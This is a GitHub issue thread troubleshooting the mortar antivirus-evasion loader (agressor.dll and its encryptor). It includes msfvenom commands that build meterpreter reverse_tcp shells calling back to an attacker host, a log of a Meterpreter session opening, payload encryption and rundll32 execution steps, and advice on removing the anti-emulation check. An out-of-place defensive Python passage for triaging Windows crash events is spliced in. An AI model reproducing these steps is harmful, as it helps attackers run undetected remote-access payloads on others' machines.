Comments (30)
It's working for https://github.com/0xsp-SRD/mortar/blob/main/demo/bin.enc but not for other payloads encrypted with the crypter
from mortar.
It works fine for me. Make sure you have compiled the DLL correctly and placed bin.enc in the same folder.
I would advise you to first use the following mimikatz to test whether agressor.dll is compiled correctly: https://github.com/0xsp-SRD/mortar/tree/main/encrypted-bins. If mimikatz works, maybe there is some issue with your msfvenom payload, which is fine on my side.
How can I double check that the DLL compiled correctly?
It seems to compile, with some errors...
I renamed mimikatz.enc to bin.enc, dropped it in the current working directory with agressor.dll, and ran rundll32.exe agressor.dll,start and rundll32.exe agressor.dll,sh
Both don't work. So, perhaps I'm not compiling agressor.dll properly. Everything seems to compile fine, how can I verify?
are you sure your project config is like that?
I just verified, those are the same settings I have.
The Windows Application log shows Event ID 1000 errors:
Faulting application name: rundll32.exe, version: 10.0.19041.746, time stamp: 0xfb4a9a6b
Faulting module name: KERNELBASE.dll, version: 10.0.19041.1706, time stamp: 0x458acb5b
Exception code: 0xe0465043
Fault offset: 0x0000000000034fd9
Faulting process id: 0x71c
Faulting application start time: 0x01d86f86ae713c8e
Faulting application path: C:\Windows\system32\rundll32.exe
Faulting module path: C:\Windows\System32\KERNELBASE.dll
Report Id: ede56f0a-c881-4752-bfc8-9c112894e97e
Faulting package full name:
Faulting package-relative application ID:
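As an added example, not from this thread or the mortar project, the Event ID 1000 record above can be parsed into fields and triaged from the defender's side: rundll32.exe itself is a signed Windows host binary, so a crash attributed to it belongs to whatever DLL it was asked to load, and an exception code set by a language runtime rather than by the OS points at third-party code running inside that host. The sample record is constructed from the lines posted above; the mapping of 0xE0465043 to the Free Pascal runtime and the list of codes are my assumptions, not something this thread states.

```python
# Constructed sample: the Event ID 1000 message text posted in this thread.
SAMPLE_EVENT = r"""Faulting application name: rundll32.exe, version: 10.0.19041.746, time stamp: 0xfb4a9a6b
Faulting module name: KERNELBASE.dll, version: 10.0.19041.1706, time stamp: 0x458acb5b
Exception code: 0xe0465043
Fault offset: 0x0000000000034fd9
Faulting process id: 0x71c
Faulting application path: C:\Windows\system32\rundll32.exe
Faulting module path: C:\Windows\System32\KERNELBASE.dll
Report Id: ede56f0a-c881-4752-bfc8-9c112894e97e
"""

# Exception codes the OS raises for ordinary native crashes.
NATIVE_CODES = {0xC0000005: "access violation", 0xC0000409: "stack buffer overrun",
                0xC000001D: "illegal instruction", 0x80000003: "breakpoint"}
# Codes chosen by language runtimes, not by Windows (assumption: 0xE0465043 is Free Pascal's).
RUNTIME_CODES = {0xE0465043: "Free Pascal runtime exception",
                 0x0EEDFADE: "Delphi runtime exception", 0xE06D7363: "MSVC C++ exception"}
# Signed Windows binaries whose crashes are really crashes of the code they hosted.
HOST_BINARIES = {"rundll32.exe", "regsvr32.exe", "mshta.exe"}


def parse_event_1000(message: str) -> dict:
    """Parse the 'key: value' text of an Event ID 1000 into a dict. Comma-separated
    sub-fields (version, time stamp) get the subject of their line as a prefix so the
    application and module values do not overwrite each other."""
    fields = {}
    for line in message.splitlines():
        prefix = ""
        for i, part in enumerate(line.split(", ")):
            if ":" not in part:
                continue
            key, _, value = part.partition(":")
            key = key.strip().lower()
            if i == 0:
                prefix = key.rsplit(" ", 1)[0]  # "faulting application name" -> "faulting application"
            else:
                key = f"{prefix} {key}"
            fields[key] = value.strip()
    return fields


def triage(fields: dict) -> dict:
    """Apply two simple rules and escalate when both fire."""
    app = fields.get("faulting application name", "").lower()
    code = int(fields.get("exception code", "0"), 16)
    findings = []
    if app in HOST_BINARIES:
        findings.append(f"{app} is a host binary; the crash belongs to the DLL it loaded")
    if code in RUNTIME_CODES:
        findings.append(f"{code:#010x} is a {RUNTIME_CODES[code]}: non-OS runtime inside {app}")
    elif code not in NATIVE_CODES:
        findings.append(f"unrecognised exception code {code:#010x}")
    return {"app": app, "code": code, "findings": findings, "escalate": len(findings) >= 2}
```

On a live host the same message text comes from Get-WinEvent on the Application log with Id 1000; combine the escalation with the process command line to see which DLL and export rundll32.exe was given.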
In order to see why that's happening on your system, let's try a shellcode load, not the PE:
msfvenom -p payload -lhost -lport -f c -o shellcode.bin
and then encrypt it, then place the bin.enc with aggressor and execute only agressor.sh
Workflow:
root@localhost:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.x.x.x LPORT=8080 -f c -o shell.c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of c file: 2166 bytes
Saved as: shell.c
C:\Users\user\Documents\GitHub\mortar\Encryptor>encryptor.exe -f \Users\user\Desktop\shell.c -o Users\user\Desktop\bin.enc
{!} Mortar Evasion Technique - Encryptor Tool
[+] 0xsp.com @zux0x3a
[+] Encrypting the binary ...
[!] content is written to \Users\user\Desktop\bin.enc
C:\Users\user\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 749B-11F1
Directory of C:\Users\user\Desktop
05/24/2022 08:52 AM <DIR> .
05/24/2022 08:52 AM <DIR> ..
05/24/2022 08:55 AM 850,928 agressor.dll
05/24/2022 09:06 AM 2,888 bin.enc
05/24/2022 10:51 PM 2,166 shell.c
Doesn't work:
C:\Users\user\Desktop>rundll32.exe agressor.dll,start
Doesn't work:
C:\Users\user\Desktop>rundll32.exe agressor.dll,sh
I will do the test on all matching OS with a clean system run. If it works on my side, maybe your system is not stable or there are other things blocking it. I will keep this issue open for now.
Okay! I'm using libvirt kvm/qemu as a hypervisor. (https://libvirt.org/drvqemu.html)
Yup, that's clear now. I have an anti-emulator technique (could be some memory allocation), so better to try a regular PC or VMs.
It is a VM though... What would be the difference between a VM on VirtualBox or VMWare Workstation vs what I'm using now?
I think that could be (not 100% sure) due to aggressor.dll not being able to allocate memory correctly. For example, in order to divert the AV emulator, the aggressor will try to see if it can allocate or not; if not, then it exits, and I feel that's what happened in your case. If you want to make sure, try to remove the following lines and retest again:
https://github.com/0xsp-SRD/mortar/blob/main/DLL/agressor.lpr#L188
if isEmulated = true then
exit
else
That didn't help with the crashes
Same results with Windows 7 :(
Small update: I installed and updated Windows 10 on Hyper-V. Removed the isEmulated if-statements, set the compiler options to Win64 and x86_64.
And it still doesn't work.
@lawrenceamer What hypervisor are you using?
try to use the following demo for the test https://github.com/0xsp-SRD/mortar/blob/main/demo/bin.enc
then agressor.dll,start
@nathan-bowman the issue was that you were using the encryptor (Windows version), which is not what should be used. In order to encrypt the files you have to use the Linux version of the encryptor; you can do that by installing Lazarus on Kali:
apt install fpc
apt install Lazarus-ide
After that, you can compile the Encryptor only and use it to encrypt Windows binaries.
While using the Linux encryptor, it should work with any x64 payload or EXE that's not a .NET assembly. I have tested mortar with msfvenom; Cobalt also works fine.
The bin.enc you provide does work for me with the agressor.dll I built. Now, trying my own shell...
Build encryptor:
root@localhost:/opt/mortar/Encryptor# lazbuild -r --cpu=x86_64 --os=Linux --verbose encryptor.lpr
Parameter: recursive
Parameter: os=Linux
Parameter: cpu=x86_64
Hint: (lazarus) primary config path: /root/.lazarus
Hint: (lazarus) [TBuildManager.SetBuildTarget] Old=x86_64-linux-gtk2 New=x86_64-linux-gtk2 Changed: OS/CPU=True LCL=False
Hint: (lazarus) [TBuildManager.SetBuildTarget] Old=x86_64-linux-gtk2 New=x86_64-linux-gtk2 Changed: OS/CPU=True LCL=False
Hint: [TPCTargetConfigCache.NeedsUpdate] TargetOS="" TargetCPU="" Options="" compiler file changed "/usr/bin/fpc" FileAge=1574718682 StoredAge=0
Hint: [TPCTargetConfigCache.NeedsUpdate] /usr/bin/fpc TargetOS= TargetCPU= CompilerOptions= ExtraOptions= PATH=/root/.nimble/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/root/.dotnet/tools:/root/go/bin/:/opt/PEzor:/opt/PEzor/deps/donut/:/opt/PEzor/deps/wclang/_prefix_PEzor_/bin/
Hint: (lazarus) [RunTool] "/usr/bin/fpc" "-iWTOTP"
Hint: (lazarus) [RunTool] "/usr/bin/fpc" "-va" "compilertest.pas"
Hint: [TPCTargetConfigCache.Update] has changed
Hint: (lazarus) Build Project: nothing to do.
TCompiler.Compile WorkingDir="/opt/mortar/Encryptor/" CompilerFilename="/usr/bin/fpc" CompilerParams=" -Tlinux -Px86_64 -MObjFPC -Scghi -Cg -O1 -g -gl -l -vewnhibq -Fi/opt/mortar/Encryptor/lib/x86_64-linux -Fu/opt/mortar/Encryptor/ -FU/opt/mortar/Encryptor/lib/x86_64-linux/ -FE/opt/mortar/Encryptor/ -o/opt/mortar/Encryptor/encryptor encryptor.lpr"
[TCompiler.Compile] CmdLine="/usr/bin/fpc -B -Tlinux -Px86_64 -MObjFPC -Scghi -Cg -O1 -g -gl -l -vewnhibq -Fi/opt/mortar/Encryptor/lib/x86_64-linux -Fu/opt/mortar/Encryptor/ -FU/opt/mortar/Encryptor/lib/x86_64-linux/ -FE/opt/mortar/Encryptor/ -o/opt/mortar/Encryptor/encryptor encryptor.lpr"
Hint: [TPCTargetConfigCache.NeedsUpdate] TargetOS="linux" TargetCPU="x86_64" Options="" compiler file changed "/usr/bin/fpc" FileAge=1574718682 StoredAge=0
Hint: [TPCTargetConfigCache.NeedsUpdate] /usr/bin/fpc TargetOS=linux TargetCPU=x86_64 CompilerOptions= ExtraOptions= PATH=/root/.nimble/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/root/.dotnet/tools:/root/go/bin/:/opt/PEzor:/opt/PEzor/deps/donut/:/opt/PEzor/deps/wclang/_prefix_PEzor_/bin/
Hint: (lazarus) [RunTool] "/usr/bin/fpc" "-iWTOTP" "-Px86_64" "-Tlinux"
Hint: (lazarus) [RunTool] "/usr/bin/fpc" "-va" "compilertest.pas" "-Px86_64" "-Tlinux"
Hint: [TPCTargetConfigCache.Update] has changed
Hint: (lazarus) TBuildManager.MacroFuncInstantFPCCache /usr/bin/instantfpc
Hint: (lazarus) [RunTool] "/usr/bin/instantfpc" "--get-cache"
Hint: (lazarus) [TBuildManager.MacroFuncInstantFPCCache] /root/.cache/instantfpc/
Info: (lazarus) Execute Title="Compile Project, Target: encryptor"
Info: (lazarus) Working Directory="/opt/mortar/Encryptor/"
Info: (lazarus) Executable="/usr/bin/fpc"
Info: (lazarus) Param[0]="-B"
Info: (lazarus) Param[1]="-Tlinux"
Info: (lazarus) Param[2]="-Px86_64"
Info: (lazarus) Param[3]="-MObjFPC"
Info: (lazarus) Param[4]="-Scghi"
Info: (lazarus) Param[5]="-Cg"
Info: (lazarus) Param[6]="-O1"
Info: (lazarus) Param[7]="-g"
Info: (lazarus) Param[8]="-gl"
Info: (lazarus) Param[9]="-l"
Info: (lazarus) Param[10]="-vewnhibq"
Info: (lazarus) Param[11]="-Fi/opt/mortar/Encryptor/lib/x86_64-linux"
Info: (lazarus) Param[12]="-Fu/opt/mortar/Encryptor/"
Info: (lazarus) Param[13]="-FU/opt/mortar/Encryptor/lib/x86_64-linux/"
Info: (lazarus) Param[14]="-FE/opt/mortar/Encryptor/"
Info: (lazarus) Param[15]="-o/opt/mortar/Encryptor/encryptor"
Info: (lazarus) Param[16]="encryptor.lpr"
Hint: (11030) Start of reading config file /etc/fpc.cfg
Hint: (11031) End of reading config file /etc/fpc.cfg
Free Pascal Compiler version 3.0.4+dfsg-23 [2019/11/25] for x86_64
Copyright (c) 1993-2017 by Florian Klaempfl and others
(1002) Target OS: Linux for x86-64
(3104) Compiling encryptor.lpr
/opt/mortar/Encryptor/encryptor.lpr(101,3) Note: (5025) Local variable "de" not used
/opt/mortar/Encryptor/encryptor.lpr(102,6) Note: (5025) Local variable "s2" not used
/opt/mortar/Encryptor/encryptor.lpr(103,7) Note: (5025) Local variable "temp" not used
/opt/mortar/Encryptor/encryptor.lpr(104,3) Note: (5025) Local variable "i" not used
/opt/mortar/Encryptor/encryptor.lpr(98,10) Warning: (5033) Function result does not seem to be set
/opt/mortar/Encryptor/encryptor.lpr(146,43) Hint: (5091) Local variable "b64_encoded" of a managed type does not seem to be initialized
(9015) Linking /opt/mortar/Encryptor/encryptor
/usr/bin/ld.bfd: warning: /opt/mortar/Encryptor/link.res contains output sections; did you forget -T?
(1008) 173 lines compiled, 0.3 sec
(1021) 1 warning(s) issued
(1022) 3 hint(s) issued
(1023) 4 note(s) issued
[TCompiler.Compile] end
Build reverse shell:
root@localhost:/opt/mortar/Encryptor# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.x.x.x LPORT=8080 --platform windows --arch x64 -f exe -o /root/shell64.exe
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: /root/shell64.exe
Test from target Win10:
[*] Meterpreter session 121 opened (172.x.x.x:8080 -> x.x.x.x:20099) at 2022-05-27 14:18:57 +0000
Encrypt:
root@localhost:/opt/mortar/Encryptor# ./encryptor -f /root/shell64.exe -o /root/bin.enc
{!} Mortar Evasion Technique - Encryptor Tool
[+] 0xsp.com @zux0x3a
[+] Encrypting the binary ...
[!] content is written to /root/bin.enc
Both of these fail on target Win10:
C:\Users\user\Desktop>rundll32.exe agressor.dll,start
C:\Users\user\Desktop>rundll32.exe agressor.dll,sh
I have the same issue. It works well with the demo/bin.enc but not with my own payload
It works with meterpreter. Sometimes you need to execute it 3/4 times to make sure it is being executed in memory.
As I said, there are no issues on the mortar side. It is a kind of memory execution delay, or it could take time to be allocated with executable shellcode or an image; if it fails the first time, execute it 3/4 times to make it work.
How exactly are you compiling encryptor?
Like?
lazbuild -r --cpu=x86_64 --os=Linux --verbose encryptor.lpr
pushed the compiled version of encryptor https://github.com/0xsp-SRD/mortar/releases/tag/v2
That works! How are you compiling it? I'm using:
lazbuild -r --cpu=x86_64 --os=Linux --verbose encryptor.lpr
^^^
@lawrenceamer can you post how you are compiling the encryptor?
Please ensure your keys match inside agressor.lpr and encryptor.lpr. The current version on GitHub uses two different keys for encrypting and decrypting. That's why the shellcode won't run. See also #21
This makes sense, I'll test later. If I don't reply again, it probably means that it worked.